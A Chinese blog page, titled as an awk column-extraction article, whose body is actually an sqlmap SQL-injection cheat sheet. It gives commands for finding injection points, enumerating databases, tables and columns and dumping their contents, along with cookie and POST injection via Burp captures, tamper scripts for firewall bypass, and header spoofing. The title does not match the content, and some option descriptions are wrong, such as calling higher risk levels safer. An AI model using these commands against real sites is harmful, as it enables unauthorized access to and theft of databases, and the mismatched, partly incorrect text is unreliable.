1. 程式人生 > 其它 >linux中awk命令提取連續列

linux中awk命令提取連續列

一般的資料庫注入步驟:

1. sqlmap -u "http://www.xx.com?id=x" 【查詢是否存在注入點

2. --dbs 【檢測站點包含哪些資料庫

3. --current-db 【獲取當前的資料庫名

4. --tables -D "db_name" 【獲取指定資料庫中的表名 -D後接指定的資料庫名稱

5. --columns -T "table_name" -D "db_name" 【獲取資料庫表中的欄位

6. --dump -C "columns_name" -T "table_name" -D "db_name" 【獲取欄位的資料內容

Cookie注入:

sqlmap -
u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 後接cookie值

POST注入:

1)目標地址http:// www.xxx.com /login.asp
(2)開啟brup代理。
(3)點選表單提交
(4)burp獲取攔截資訊(post)
(5)右鍵儲存檔案(.txt)到指定目錄下
(6)執行sqlmap並執行如下命令:
        用例:sqlmap -r okay.txt  -p  username
        -r表示載入檔案(及步驟(5)儲存的路徑),-p指定引數(即攔截的post請求中表單提交的使用者名稱或密碼等name引數)
(
7)自動獲取表單:--forms自動獲取表單 例如:sqlmap -u www.xx.com/login.asp --forms8)指定引數搜尋:--data 例如:sqlmap -u www.xx.com/login.asp --data "username=1"

SQLMAP常用的命令:

1.    --purge      【重新掃描(--purge 刪除原先對該目標掃描的記錄)

2.    --tables      【獲取表名

3.     --dbs         【檢測站點包含哪些資料庫

4.     --current-db    【獲取當前的資料庫名

5. --current-user 【檢測當前使用者 6. --is-dba 【判斷站點的當前使用者是否為資料庫管理員 7. --batch 【預設確認,不詢問你是否輸入 8. --search 【後面跟引數 -D -T -C 搜尋列(C),表(T)和或資料庫名稱(D) 9. --threads 10 【執行緒,sqlmap執行緒最高設定為10 10. --level 3 【sqlmap預設測試所有的GET和POST引數,當--level的值大於等於2的時候也會測試HTTP Cookie頭 的值,當大於等於3的時候也會測試User-Agent和HTTP Referer頭的值。最高為5 11. --risk 3 【執行測試的風險(0-3,預設為1)risk越高,越慢但是越安全 12. -v 【詳細的等級(0-6) 0:只顯示Python的回溯,錯誤和關鍵訊息。 1:顯示資訊和警告訊息。 2:顯示除錯訊息。 3:有效載荷注入。 4:顯示HTTP請求。 5:顯示HTTP響應頭。 6:顯示HTTP響應頁面的內容 13. --privileges 【檢視許可權 14. --tamper xx.py,cc.py 【防火牆繞過,後接tamper庫中的py檔案 15. --method "POST" --data "page=1&id=2" 【POST方式提交資料 16. --threads number  【採用多執行緒 後接執行緒數 17. --referer "" 【使用referer欺騙 18. --user-agent "" 【自定義user-agent 19. --proxy “目標地址″ 【使用代理注入

Kali系統整合的SQLMAP工具目錄:

sqlmap常用路徑:
1. 新增表字段的目錄在sqlmap/txt/common-tables.txt
2. 存放掃描記錄的目錄在sqlmap/output